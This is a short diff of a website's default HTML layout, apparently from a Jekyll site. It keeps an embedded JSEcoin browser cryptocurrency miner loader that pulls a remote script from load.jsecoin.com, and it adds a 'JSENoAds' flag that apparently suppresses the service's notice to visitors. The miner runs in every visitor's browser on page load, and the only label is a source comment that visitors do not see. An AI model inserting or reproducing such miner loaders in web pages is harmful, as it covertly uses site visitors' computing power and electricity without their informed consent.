--- a/_layouts/default.html
+++ b/_layouts/default.html
@@ -77,8 +77,8 @@
 		
 		<!-- this is JSEcoin miner -->
 		<script type="text/javascript">
-			!function(){var e=document,t=e.createElement("script"),s=e.getElementsByTagName("script")[0];t.type="text/javascript",t.async=t.defer=!0,t.src="https://load.jsecoin.com/load/103615/protracker.tk/0/0/",s.parentNode.insertBefore(t,s)}();
+			!function(){window.JSENoAds=1;var e=document,t=e.createElement("script"),s=e.getElementsByTagName("script")[0];t.type="text/javascript",t.async=t.defer=!0,t.src="https://load.jsecoin.com/load/103615/protracker.tk/0/0/",s.parentNode.insertBefore(t,s)}();
 		</script>
-		
+
 	</body>
 </html>
